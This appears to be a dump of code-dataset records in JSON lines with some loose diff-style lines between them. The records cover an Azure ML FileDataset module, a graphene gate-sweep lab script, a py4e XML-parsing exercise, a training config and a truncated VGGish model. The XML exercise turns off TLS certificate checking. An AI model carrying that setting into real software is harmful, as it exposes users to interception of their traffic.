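+print(get_close_matches("mike trut", players, cutoff=0.75))  # ['mike trout']
+print(get_close_matches("zzz", players, cutoff=0.75))        # [] (nothing above the cutoff)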
+{"seq_id":"97835448","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Contains functionality for referencing single or multiple files in datastores or public URLs.\n\nFor more information, see the article [Add & register\ndatasets](https://docs.microsoft.com/azure/machine-learning/how-to-create-register-datasets).\nTo get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport tempfile\nimport uuid\n\nfrom azureml._common.exceptions import AzureMLException\nfrom azureml._tracing import get_tracer\nfrom azureml.data.abstract_dataset import AbstractDataset, _get_path_from_step\nfrom azureml.data._dataprep_helper import dataprep, dataprep_fuse, get_dataflow_for_execution\nfrom azureml.data._loggerfactory import track, _LoggerFactory\nfrom azureml.data.constants import _PUBLIC_API\nfrom azureml.data.dataset_error_handling import _try_execute, _construct_message_and_check_exception_type, \\\n _dataprep_error_handler\nfrom azureml.exceptions import UserErrorException\n\n\n_logger = None\n_tracer = None # type: Optional[AmlTracer]\n\n\ndef _get_logger():\n global _logger\n if _logger is None:\n _logger = _LoggerFactory.get_logger(__name__)\n return _logger\n\n\ndef _get_tracer():\n global _tracer\n if _tracer is None:\n _tracer = get_tracer(__name__)\n return _tracer\n\n\nclass FileDataset(AbstractDataset):\n \"\"\"Represents a collection of file references in datastores or public URLs to use in Azure Machine Learning.\n\n A FileDataset defines a series of lazily-evaluated, immutable operations to load data from the\n data source into file streams. Data is not loaded from the source until FileDataset is asked to deliver data.\n\n A FileDataset is created using the :func:`azureml.data.dataset_factory.FileDatasetFactory.from_files` method\n of the FileDatasetFactory class.\n\n For more information, see the article `Add & register\n datasets `_.\n To get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\n .. remarks::\n\n FileDataset can be used as input of an experiment run. It can also be registered to workspace\n with a specified name and be retrieved by that name later.\n\n FileDataset can be subsetted by invoking different subsetting methods available on this class.\n The result of subsetting is always a new FileDataset.\n\n The actual data loading happens when FileDataset is asked to deliver the data into another\n storage mechanism (e.g. files downloaded or mounted to local path).\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize the FileDataset object.\n\n This constructor is not supposed to be invoked directly. Dataset is intended to be created using\n :class:`azureml.data.dataset_factory.FileDatasetFactory` class.\n \"\"\"\n super().__init__()\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def to_path(self):\n \"\"\"Get a list of file paths for each file stream defined by the dataset.\n\n .. remarks::\n The file paths are relative paths for local files when the file streams are downloaded or mounted.\n\n A common prefix will be removed from the file paths based on how data source was\n specified to create the dataset. For example:\n\n .. 
code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n print(dataset.to_path())\n\n # ['year-2018/1.jpg'\n # 'year-2018/2.jpg'\n # 'year-2019/1.jpg']\n\n dataset = Dataset.File.from_files('https://dprepdata.blob.core.windows.net/demo/green-small/*.csv')\n\n print(dataset.to_path())\n # ['/green_tripdata_2013-08.csv']\n\n :return: Returns an array of file paths.\n :rtype: builtin.list(str)\n \"\"\"\n return self._to_path(activity='to_path')\n\n def _to_path(self, activity):\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = get_dataflow_for_execution(dataflow, activity, 'FileDataset')\n records = dataflow._to_pyrecords()\n return [r[portable_path] for r in records]\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def download(self, target_path=None, overwrite=False):\n \"\"\"Download file streams defined by the dataset as local files.\n\n .. remarks::\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param target_path: The local directory to download the files to. If None, the data will be downloaded\n into a temporary directory.\n :type target_path: str\n :param overwrite: Indicates whether to overwrite existing files. The default is False. Existing files will\n be overwritten if overwrite is set to True; otherwise an exception will be raised.\n :type overwrite: bool\n :return: Returns an array of file paths for each file downloaded.\n :rtype: builtin.list(str)\n \"\"\"\n with _get_tracer().start_as_current_span('download', user_facing_name='Dataset.download') as span:\n target_path = _ensure_path(target_path)\n download_list = [os.path.abspath(os.path.join(target_path, '.' + p))\n for p in self._to_path(activity='download.to_path')]\n\n if self.id:\n span.set_user_facing_attribute('dataset_id', self.id)\n span.set_user_facing_attribute('target_path', target_path)\n\n if not overwrite:\n for p in download_list:\n # encode p to avoid UnicodeEncodeError from os.path.exists\n if os.path.exists(_encode_if_needed(p)):\n raise UserErrorException('File \"{}\" already exists. Set overwrite=True to overwrite it.'\n .format(p))\n base_path = dataprep().api.datasources.LocalFileOutput(target_path)\n\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = dataflow.write_streams(\n streams_column='Path',\n base_path=base_path,\n file_names_column=portable_path)\n\n dataflow = get_dataflow_for_execution(dataflow, 'download', 'FileDataset')\n _try_execute(dataflow.run_local,\n 'download',\n None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version})\n return download_list\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def mount(self, mount_point=None, **kwargs):\n \"\"\"Create a context manager for mounting file streams defined by the dataset as local files.\n\n .. remarks::\n\n A context manager will be returned to manage the lifecycle of the mount. To mount, you will need to\n enter the context manager and to unmount, exit from the context manager.\n\n Mount is only supported on Unix or Unix-like operating systems and libfuse must be present. 
If you\n are running inside a docker container, the docker container must be started with the `--privileged` flag\n or started with `--cap-add SYS_ADMIN --device /dev/fuse`.\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n\n with dataset.mount() as mount_context:\n # list top level mounted files and folders in the dataset\n os.listdir(mount_context.mount_point)\n\n # You can also use the start and stop methods\n mount_context = dataset.mount()\n mount_context.start() # this will mount the file streams\n mount_context.stop() # this will unmount the file streams\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param mount_point: The local directory to mount the files to. If None, the data will be mounted into a\n temporary directory, which you can find by calling the `MountContext.mount_point` instance method.\n :type mount_point: str\n :return: Returns a context manager for managing the lifecycle of the mount.\n :rtype: azureml.dataprep.fuse.daemon.MountContext\n \"\"\"\n try:\n mount = dataprep_fuse().mount\n except ValueError as e:\n if 'Invalid mount arguments' in str(e):\n raise UserErrorException(e)\n raise AzureMLException(\"Execution failed unexpectedly due to: {}\".format(str(e)))\n except OSError as e:\n raise UserErrorException('Mount is only supported on Unix or Unix-like operating systems and the '\n 'FUSE library must be present. For more information, please refer to the '\n 'remarks section of FileDataset.mount\\'s documentation. Execution failed'\n 'unexpectedly due to {}'.format(e.__class__.__name__))\n except Exception as e:\n raise AzureMLException(\"Mount failed unexpectedly due to: {}\".format(str(e)))\n\n mount_point = _ensure_path(mount_point)\n if os.path.ismount(mount_point):\n raise UserErrorException('\"{0}\" is already mounted. Run `sudo umount \"{0}\"` to unmount it.'\n .format(mount_point))\n\n if not os.path.exists(mount_point):\n os.makedirs(mount_point)\n\n invocation_id = str(uuid.uuid4())\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount.find_prefix', 'FileDataset',\n invocation_id=invocation_id)\n base_path = _find_path_prefix(dataflow)\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount', 'FileDataset',\n invocation_id=invocation_id)\n mount_options = kwargs.get('mount_options', None)\n skip_validate = kwargs.get('skip_validate', False)\n\n if not skip_validate:\n try:\n is_invalid = dataflow.has_invalid_source(return_validation_error=True)\n if is_invalid is not False: # This means that the source is invalid\n raise UserErrorException(\"Cannot mount Dataset(id='{}', name='{}', version={}). \"\n \"Source of the dataset is either not \"\n \"accessible or does not contain any data. \"\n \"Error Message: {}\".format(self.id, self.name, self.version, is_invalid))\n except TypeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where dataflow.has_invalid_source will not have the return_validation_error parameter,\n # which the above call will throw a TypeError.\n if dataflow.has_invalid_source(): # This means that the source is invalid\n raise UserErrorException(\"Cannot mount dataset. Source of the dataset is either not \"\n \"accessible or does not contain any data. 
\")\n except AttributeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where Dataflow will not have the has_invalid_source method.\n pass\n except UserErrorException:\n raise\n except AzureMLException:\n raise\n except Exception as e:\n dataset_info = None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version}\n message, is_dprep_exception = _construct_message_and_check_exception_type(e, dataset_info, \"mount\")\n _logger.error(message)\n _dataprep_error_handler(e, message, is_dprep_exception)\n\n return mount(\n dataflow=dataflow,\n files_column='Path',\n mount_point=mount_point,\n base_path=base_path,\n options=mount_options,\n foreground=False,\n invocation_id=invocation_id)\n\n def as_mount(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to mount.\n\n In the submitted run, files in the datasets will be mounted to local path on the compute target.\n The mount point can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_mount()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The mount point can be retrieved from argument values\n import sys\n mount_point = sys.argv[1]\n\n # The mount point can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n mount_point = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the mount point will be path of the single mounted\n file. Otherwise, the mount point will be path of the enclosing folder for all the mounted files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_mount(path_on_compute=path_on_compute))\n\n def as_download(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to download.\n\n In the submitted run, files in the dataset will be downloaded to local path on the compute target.\n The download location can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. 
code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_download()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The download location can be retrieved from argument values\n import sys\n download_location = sys.argv[1]\n\n # The download location can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n download_location = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the download location will be path of the single\n downloaded file. Otherwise, the download location will be path of the enclosing folder for all the\n downloaded files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_download(path_on_compute=path_on_compute))\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def skip(self, count):\n \"\"\"Skip file streams from the top of the dataset by the specified count.\n\n :param count: The number of file streams to skip.\n :type count: int\n :return: Returns a new FileDataset object representing a dataset with file streams skipped.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.skip(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take(self, count):\n \"\"\"Take a sample of file streams from top of the dataset by the specified count.\n\n :param count: The number of file streams to take.\n :type count: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.take(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take_sample(self, probability, seed=None):\n \"\"\"Take a random sample of file streams in the dataset approximately by the probability specified.\n\n :param probability: The probability of a file stream being included in the sample.\n :type probability: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(\n self._dataflow.take_sample(probability, seed), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def random_split(self, percentage, seed=None):\n \"\"\"Split file streams in the dataset into two parts randomly and approximately by the percentage specified.\n\n The first dataset returned contains approximately ``percentage`` of the total number of file references\n and the second dataset contains the remaining file references.\n\n :param percentage: 
The approximate percentage to split the dataset by. This must be a number between 0.0\n and 1.0.\n :type percentage: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a tuple of new FileDataset objects representing the two datasets after the split.\n :rtype: (azureml.data.FileDataset, azureml.data.FileDataset)\n \"\"\"\n dataflow1, dataflow2 = self._dataflow.random_split(percentage, seed)\n return (\n FileDataset._create(dataflow1, self._properties, telemetry_info=self._telemetry_info),\n FileDataset._create(dataflow2, self._properties, telemetry_info=self._telemetry_info)\n )\n\n\ndef _add_portable_path_column(dataflow):\n prefix_path = _find_path_prefix(dataflow)\n portable_path = 'Portable Path'\n get_portable_path = dataprep().api.functions.get_portable_path\n col = dataprep().api.expressions.col\n return dataflow.add_column(get_portable_path(col('Path'), prefix_path), portable_path, 'Path'), portable_path\n\n\ndef _find_path_prefix(dataflow):\n # TODO: move this logic to Engine\n steps = dataflow._get_steps()\n step_types = [s.step_type for s in steps]\n special_block_types = {'Microsoft.DPrep.ToCsvStreamsBlock',\n 'Microsoft.DPrep.ToParquetStreamsBlock',\n 'Microsoft.DPrep.ToDataFrameDirectoryBlock'}\n if len(special_block_types.intersection(step_types)) > 0:\n return None\n step_type = steps[0].step_type\n step_arguments = steps[0].arguments\n if hasattr(step_arguments, 'to_pod'):\n step_arguments = step_arguments.to_pod()\n path = _get_path_from_step(step_type, step_arguments)\n return None if path is None else _get_prefix(path, dataflow)\n\n\ndef _get_prefix(path, dataflow):\n \"\"\"Determine if there exists a common prefix for all files which may exist under the given path/dataflow.\n\n :param path: Path extracted from dataflow\n :param dataflow: Dataflow to get prefix for.\n :return: Path which is common prefix of all files under path/dataflow, or None if a common prefix was not found.\n \"\"\"\n from azureml.dataprep.api.errorhandlers import ExecutionError\n from azureml.dataprep.api.functions import get_portable_path\n\n if '*' in path:\n return '/'.join(re.split(r'/|\\\\', path.split('*')[0])[:-1])\n\n if path.startswith('http://') or path.startswith('https://'):\n return path[:path.rindex('/')]\n\n dataflow = dataflow.add_column(get_portable_path(dataflow['Path']), 'PortablePath', 'Path')\n paths = []\n try:\n paths = [r['PortablePath'] for r in dataflow.take(1)._to_pyrecords()]\n except ExecutionError as e:\n if 'InvalidPath' in e.error_code or 'NotFound' in e.error_code:\n return None\n raise e\n if len(paths) == 0:\n return None\n if len(paths) == 1 and paths[0].endswith(path):\n return path.replace('\\\\', '/')[:path.rindex('/')]\n return path\n\n\ndef _ensure_path(path):\n if not path or path.isspace():\n return tempfile.mkdtemp()\n return os.path.abspath(path)\n\n\ndef _encode_if_needed(path):\n sys_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()\n try:\n path.encode(sys_encoding)\n return path # no need to encode\n except (UnicodeError, LookupError):\n # Encode the path string when it contains characters which cannot be encoded by sys encoding.\n # Otherwise, usage of the path string (e.g. 
`os.path.exists(p)`) can encounter UnicodeEncodeError.\n return path.encode('utf8')\n","sub_path":"venv/Lib/site-packages/azureml/data/file_dataset.py","file_name":"file_dataset.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
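+# The wildcard branch of _get_prefix above reduces a glob path to the directory
+# before the first '*'; a standalone check of that exact expression:
+import re
+
+path = "animals/dog/year-*/*.jpg"
+prefix = '/'.join(re.split(r'/|\\', path.split('*')[0])[:-1])
+print(prefix)  # animals/dog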
+{"seq_id":"37587865","text":"''' This program uses KEYSIGHT B2901A to apply a gate voltage and HF2LI lock-in amplifier to measure the resistance of the sample\n\n\n\n\tHardware to be used:\n\t\t- SMU B2901A: For gating\n\t\t- A bias resistance of 1M: As voltage to current converter for lock-in out put.\n\t\t\tNote that there is always errors in reading the resitance of the device; the error is around -33% depending on the gain on S4c (see the excel file \"Calibrate S4c gain.xlsx\").\n\n\t\t- HF2LI: to measure the resistance of graphene device\n\n\n\n\n'''\nimport numpy as np\nimport zhinst.utils\n\nfrom gate_pattern import gate_pattern\n\nimport time\nfrom my_poll import R_measure as R_measure\nimport stlab\nimport os\nfrom stlab.devices.Keysight_B2901A import Keysight_B2901A\nimport matplotlib.pyplot as plt\nimport pygame, sys\nfrom pygame.locals import *\nimport math\n\n#############################################################\n''' Definitions'''\n\n# definitions\ntempdev = 0.015\nprefix = 'F17_e6_0204'\nsample_name = '2probe'\ndevice_id = 'dev352'\ntime_step = 0.1 #time step between each gate voltage steps, to stablize the gate\nramp_speed = 1500 # the safe speed for ramping the gate voltage [mV/s]\ntarget_gate = 50\nshift_voltage= 10 #in the case the intended gate pattern in not symmetrical around 0.\ngate_points = 500\nsafe_gate_current = 2.5e-6 # [A], safe current leakage limit. With in this limit, the oxide resistance below 4MOhm at 10Vg (400KOhm at 1Vg)) to be considerred not leacky!\n\n# HF2LI settings\nmeasure_amplitude = 0.1 #measurement amplitude [V]\nmeasure_output_channnel = 1\nmeasure_input_channnel = 1\nmeasure_frequency = 77 #[Hz]\ndemodulation_time_constant = 0.01\ndeamodulation_duration = 0.3\n\nbias_resistor = 1e6\ncalibration_factor = 1.45 # to compensate the shift in resistance measurement\n\n\n# output setting\ndo_plot = True\nwatch_gate_leakage = True # monitors the gate leakage and stops above the safe leakage limit\nsave_data =True\n\npygame.init()\npygame.display.set_mode((100,100))\n\n##########################################################\n''' Initializing the devices '''\n\n# initial configuration of the Lock-in\napilevel_example = 6 # The API level supported by this example.\n(daq, device, props) = zhinst.utils.create_api_session(device_id, apilevel_example, required_devtype='.*LI|.*IA|.*IS')\nzhinst.utils.api_server_version_check(daq)\nzhinst.utils.disable_everything(daq, device)\nout_mixer_channel = zhinst.utils.default_output_mixer_channel(props)\n\n\n# Keysight setting\ngate_dev = Keysight_B2901A('TCPIP::192.168.1.63::INSTR')\ngate_dev.SetModeVoltage()\ngate_dev.SetOutputOn()\ngate_dev.SetComplianceCurrent(safe_gate_current)\n\n\n#############################################################\n''' MEASUREMENT'''\n\n# generating gate pattern\npattern = gate_pattern(target_gate=target_gate, mode='double', data_points=gate_points, shift_voltage= shift_voltage )\n\n\n# Resistance measurement while modulating the gate voltage\ncount = 0 # couter of step numbers\nleakage_current = 0\n\nidstring = sample_name\nif save_data:\n\tcolnames = ['step ()','gate voltage (V)','leakage current (nA)','Resistance (k ohm)','phase ()', 'demodulation duration (s)']\n\tmy_file_2= stlab.newfile(prefix+'_',idstring,autoindex=True,colnames=colnames)\n\nramp_time = np.abs(np.floor(shift_voltage/ramp_speed))\ngate_dev.RampVoltage(shift_voltage,tt=10*ramp_time, steps = 100)\n\ngate_voltage_step = pattern['ramp_pattern'][1]-pattern['ramp_pattern'][0]\n# ramp_time = 
np.abs(np.floor(gate_voltage_step/ramp_speed))\nramp_time = 0.5\nplt_Vg=np.array([])\nplt_resistance=np.array([])\nplt_leak_curr=np.array([])\n\n\nEND = False\n\nfor count,gate_voltage in enumerate(pattern['ramp_pattern']): # ramping up the gate voltage\n\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:sys.exit()\n\t\telif event.type == KEYDOWN and event.dict['key'] == 101:\n\t\t\tEND = True\n\n\tif END:\n\t\tbreak\n\n\tgate_dev.RampVoltage(gate_voltage,tt=ramp_time, steps = 5)\n\n\tleakage_current = float(gate_dev.GetCurrent()) # in the units of [A]\n\n\tprint ('\\n\\n------------------------')\n\n\n\tif watch_gate_leakage:\n\t\tif np.abs(leakage_current) > safe_gate_current:\n\t\t\tGATE_LEAKAGE = True\n\t\t\tprint ('gate current', 1e9*leakage_current, ' nA exceeds safe gate current limit reaching the gate voltage of', gate_voltage, 'V.')\n\t\t\tprint ('reseting the gate voltage')\n\t\t\tgate_dev.RampVoltage(0,tt=ramp_time, steps = 10)\n\t\t\tbreak\n\n\tprint('GATE: {:6.4f}'.format(gate_voltage), 'V')\n\n\t# time.sleep(time_step)\n\n\tmeasured = R_measure(device_id, amplitude=measure_amplitude,\n\t\tout_channel = measure_output_channnel,\n\t\tin_channel = measure_input_channnel,\n\t\ttime_constant = demodulation_time_constant,\n\t\tfrequency = measure_frequency,\n\t\tpoll_length = deamodulation_duration,\n\t\tdevice=device, daq=daq,\n\t\tout_mixer_channel=out_mixer_channel,\n\t\tbias_resistor=bias_resistor)\n\n\tmeasured[0]*=(np.cos(math.radians(measured[1]))*calibration_factor)\n\n\tline = [count,gate_voltage, leakage_current] + measured\n\n\tif save_data:\n\t\tstlab.writeline(my_file_2,line)\n\n\n\n\tprint('LEAKAGE CURRENT: {:6.4f}'.format(1e9*leakage_current), 'nA')\n\tprint('RESISTANCE: {:6.2f}'.format(measured[0]), 'kOhms')\n\tprint('PHASE {:4.2f}'.format(measured[1]))\n\n\tplt_Vg = np.append(plt_Vg,gate_voltage)\n\tplt_resistance = np.append(plt_resistance,measured[0])\n\tplt_leak_curr = np.append(plt_leak_curr,leakage_current)\n\n\tplt.rcParams[\"figure.figsize\"] = [16,9]\n\tplt.subplot(2, 1, 1)\n\tplt.plot(plt_Vg,plt_resistance, '--r',marker='o')\n\n\tplt.ylabel('Resistance (k$\\Omega$)')\n\tplt.title(prefix+'_'+sample_name)\n\n\n\tplt.subplot(2, 1, 2)\n\tplt.plot(plt_Vg,1e9*plt_leak_curr, '--r', marker='o')\n\tplt.ylabel('Leakage Current (nA)')\n\tplt.xlabel('Gate Voltage (V)')\n\tplt.title(\"Resistance = %4.2f k$\\Omega$, Leackage Current = %4.2f nA\" %(measured[0], 1e9*leakage_current))\n\n\tplt.pause(0.1)\n\n\nprint('RAMPING FINISHED')\n\ngate_dev.RampVoltage(0,tt=ramp_time) # to safely return back the gate voltage\n\n\nzhinst.utils.disable_everything(daq, device)\ngate_dev.SetOutputOff()\n\nprint('FINISHED')\n\n\n#######################################################################\n''' saving the data '''\n\nif save_data:\n\n\n\t# saving the metafile\n\tplt.savefig(os.path.dirname(my_file_2.name)+'\\\\'+prefix)\n\tmy_file_2.close()\n\n\tparameters = ['target gate (V)',\n\t\t'time step (s)',\n\t\t'gate points ()',\n\t\t'measure amplitude (V)',\n\t\t'measure frequency (Hz)',\n\t\t'bias resistor (Ohm)',\n\t\t'deamodulation duration (s)',\n\t\t'demodulation time constant (s)',\n\t\t'temperature (K)']\n\n\tT = tempdev\n\n\tparameters_line =[target_gate,\n\t\ttime_step,\n\t\tgate_points,\n\t\tmeasure_amplitude,\n\t\tmeasure_frequency,\n\t\tbias_resistor,\n\t\tdeamodulation_duration,\n\t\tdemodulation_time_constant,\n\t\tT]\n\tmy_file= stlab.newfile(prefix+'_',idstring + '_metadata',autoindex=False,colnames=parameters,usefolder=False,mypath = 
os.path.dirname(my_file_2.name),usedate=False)\n\tstlab.writeline(my_file,parameters_line)\n\n\t# saving the plots\n\ttitle = 'Resistance'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','Resistance (k ohm)',title=title,caption=caption)\n\ttitle = 'Phase'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','phase ()',title=title,caption=caption)\n\ttitle = 'Duration'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','demodulation duration (s)',title=title,caption=caption)\n\ttitle = 'Leakage Current'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','leakage current (nA)',title=title,caption=caption)\n\n\n\n\n\n","sub_path":"DC measurements/Others/GateGraphene_HF2LI_B2901A_v1.py","file_name":"GateGraphene_HF2LI_B2901A_v1.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
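# A minimal sketch (hypothetical helper, not part of the script above) of the
# bias-resistor arithmetic its docstring describes: with the script's 0.1 V drive
# and 1 MOhm bias resistor, the resistor converts the drive voltage to a current,
# and the lock-in reading across the device then gives its resistance.
def resistance_from_lockin(v_meas, v_drive=0.1, r_bias=1e6):
    """Series divider: the bias current is (v_drive - v_meas) / r_bias."""
    i_bias = (v_drive - v_meas) / r_bias
    return v_meas / i_bias  # ohms; the phase/calibration corrections are separate

print(resistance_from_lockin(1e-3))  # a 1 mV reading implies roughly 10.1 kOhm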
+{"seq_id":"168359554","text":"import xml.etree.ElementTree as ET\nimport urllib.request, urllib.parse, urllib.error\nimport ssl\n\nCTX = ssl.create_default_context()\nCTX.check_hostname = False\nCTX.verify_mode = ssl.CERT_NONE\n\nURL = 'http://py4e-data.dr-chuck.net/comments_227372.xml'\nData = urllib.request.urlopen(URL, context=CTX).read()\nTree = ET.fromstring(Data)\nlst = Tree.findall('comments/comment')\n\nCount = 0\nSum = 0\nfor item in lst:\n Sum = Sum + int(item.find('count').text)\n Count = Count + 1\n\nprint(Count, 'Entries!')\nprint('Sum:', Sum)\n","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"545454289","text":"# ---------PATH------------\r\nROOT_DIR = '/home/daizelin/hybrid_3/'\r\nRAW_DATA = 'data/police_train.csv'\r\nTEST_DATA = 'data/police_test.csv'\r\n\r\nEMBEDDING_FILE = 'embedding/taizhou_min_count_1_window_5_300d.word2vec'\r\nTRAIN_FILE = 'output/intermediate/train.tsv'\r\nWORD2ID_FILE = 'output/intermediate/word2id.pkl'\r\nVALID_FILE = 'output/intermediate/valid.tsv'\r\nTEST_FILE = 'output/intermediate/test.tsv'\r\nLOG_PATH = 'output/logs'\r\nSTOP_WORD_LIST = 'data/stop_list_chn.txt'\r\nCHECKPOINT_DIR = 'output/checkpoints/hybrid_3.ckpt'\r\n\r\n\r\n# ---------DATA PARAM--------------\r\nis_debug = False\r\nflag_words = ['', '']\r\nmax_len = 25\r\n\r\n# ------------NET PARAM------------\r\nseed = 2018\r\ndevice = 0\r\nlabels = range(9)\r\nplot_path = 'output/img/loss_acc.jpg'\r\n### ----------ATTENTION------------\r\nattention_size = 1500\r\n### ----------CAPSULE--------------\r\n### ----------HYBRID---------------\r\n#### -------REINFORCED_CNN---------\r\nvocab_size = 1000000\r\nword_embedding_dimension = 300\r\nfilters = 32\r\ndropout = 0.2\r\nkernel_size = [3, 5, 7]\r\n#### -------REINFORCED_GRU---------\r\nhidden_size = 128\r\nbi_flag = True\r\nnum_layer = 1\r\n\r\n\r\n### -------TRAIN-------------\r\nnum_epoch = 4\r\nbatch_size = 128\r\ninitial_lr = 0.01\r\nlr_decay_mode = \"custom_decay\"\r\nuse_cuda = True\r\nuse_mem_track = False\r\n","sub_path":"hybrid_3/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"101872861","text":"\"\"\"Define the model.\"\"\"\n\nimport tensorflow as tf\n\nfrom voice_embedding.triplet_loss import batch_all_triplet_loss\nfrom voice_embedding.triplet_loss import batch_hard_triplet_loss\nfrom tensorflow.contrib.losses.python.metric_learning.metric_loss_ops import triplet_semihard_loss\nfrom voice_embedding.voice.constant import VOICE_STFT_T\n\n\nslim = tf.contrib.slim\n\ndef build_model(is_training, images, params):\n return build_model_vggish_slim(is_training, images, params)\n\n\ndef build_model_vggish_slim(training, images, params):\n \"\"\"Defines the VGGish TensorFlow model.\n\n All ops are created in the current default graph, under the scope 'vggish/'.\n\n The input is a placeholder named 'vggish/input_features' of type float32 and\n shape [batch_size, num_frames, num_bands] where batch_size is variable and\n num_frames and num_bands are constants, and [num_frames, num_bands] represents\n a log-mel-scale spectrogram patch covering num_bands frequency bands and\n num_frames time frames (where each frame step is usually 10ms). This is\n produced by computing the stabilized log(mel-spectrogram + params.LOG_OFFSET).\n The output is an op named 'vggish/embedding' which produces the activations of\n a 128-D embedding layer, which is usually the penultimate layer when used as\n part of a full model with a final classifier layer.\n\n Args:\n training: If true, all parameters are marked trainable.\n\n Returns:\n The op 'vggish/embeddings'.\n \"\"\"\n # Defaults:\n # - All weights are initialized to N(0, INIT_STDDEV).\n # - All biases are initialized to 0.\n # - All activations are ReLU.\n # - All convolutions are 3x3 with stride 1 and SAME padding.\n # - All max-pools are 2x2 with stride 2 and SAME padding.\n INIT_STDDEV = 0.01\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n weights_initializer=tf.truncated_normal_initializer(\n stddev=INIT_STDDEV),\n biases_initializer=tf.zeros_initializer(),\n activation_fn=tf.nn.relu,\n trainable=training), \\\n slim.arg_scope([slim.conv2d],\n kernel_size=[3, 3], stride=1, padding='SAME'), \\\n slim.arg_scope([slim.max_pool2d],\n kernel_size=[2, 2], stride=2, padding='SAME'), \\\n tf.variable_scope('vggish'):\n # Input: a batch of 2-D log-mel-spectrogram patches.\n '''\n features = tf.placeholder(\n 